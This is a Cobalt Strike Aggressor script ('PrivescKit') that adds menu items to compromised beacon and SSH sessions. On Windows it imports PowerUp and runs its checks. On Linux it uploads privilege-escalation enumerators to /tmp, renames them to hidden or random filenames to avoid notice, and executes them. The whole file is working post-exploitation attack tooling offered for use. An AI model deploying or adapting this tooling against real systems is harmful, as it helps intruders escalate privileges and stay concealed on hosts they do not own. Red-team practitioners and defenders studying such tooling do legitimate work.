# Actions in this kit center around endpoint privilege escalation. Actions that involve forceful scanning (powerup.ps1, unix-privesc-check) should go in the apporiate section
# @Und3rf10w

popup beacon_bottom {
	menu "PrivescKit" {
		menu "Scanners"{
			item "All PowerUp checks"{
				local('$bid');
				foreach $bid ($1){
					binput($bid, "powershell-import PowerUp.ps1");
					bpowershell_import($bid, script_resource("PrivescKit/scripts/PowerUp.ps1"));
					binput($bid, "powerpick Invoke-AllChecks");
					bpowerpick($bid, "Invoke-AllChecks");
				}
			}
		}
	}
}

popup ssh {
	menu "PrivescKit" {
		menu "Scanners"{
			item "Run LinEnum.sh"{
				local('$bid');
				foreach $bid ($1){
					bcd($1, "/tmp");
					bupload($1, script_resource("PrivescKit/scripts/LinEnum.sh"));
					bshell($1, "mv /tmp/LinEnum.sh /tmp/.AGq4yheattttt5y.sh");
					bshell($1, "chmod +x /tmp/.AGq4yheattttt5y.sh")
					bshell($1, "/tmp/.AGq4yheattttt5y.sh -t");
					blog($1, "Make sure you delete the /tmp/.AGq4yheattttt5y.sh file once the script is complete");	
				}
			}
			item "Run unix-privesc-check"{
				local('$bid');
				foreach $bid ($1){
					bcd($1, "/tmp");
					bupload($1, script_resource("PrivescKit/scripts/unix-privesc-check"));
					bshell($1, "mv /tmp/unix-privesc-check /tmp/.AGr5qgrakHSTR");
					bshell($1, "chmod +x /tmp/.AGr5qgrakHSTR");
					bshell($1, "/tmp/.AGr5qgrakHSTR detailed");
					blog($1, "Make sure you delete the /tmp/.AGr5qgrakHSTR file once the script is complete");
				}
			}
			item "Run linuxprivchecker.py"{
				local('$bid');
				foreach $bid ($1){
					bcd($1, "/tmp");
					bupload($1, script_resource("PrivescKit/scripts/linuxprivchecker.py"));
					bshell($1, "mv /tmp/linuxprivchecker.py /tmp/AGa5qgrakHSTR.py");
					bshell($1, "chmod +x /tmp/AGa5qgrakHSTR.py");
					bshell($1, "/tmp/AGa5qgrakHSTR.py detailed");
					blog($1, "Make sure you delete the /tmp/AGa5qgrakHSTR.py file once the script is complete");
				}
			}
			item "Run privescalation.sh"{
				local('$bid');
				foreach $bid ($1){
					bcd($1, "/tmp");
					bupload($1, script_resource("PrivescKit/scripts/privescalation.sh"));
					bshell($1, "mv /tmp/privescalation.sh /tmp/AGa5qgrbkHSTR.py");
					bshell($1, "chmod +x /tmp/AGa5qgrbkHSTR.py");
					bshell($1, "/tmp/AGa5qgrbkHSTR.py detailed");
					blog($1, "Make sure you delete the /tmp/AGa5qgrbkHSTR.py file once the script is complete");
				}
			}

		}
	}
}

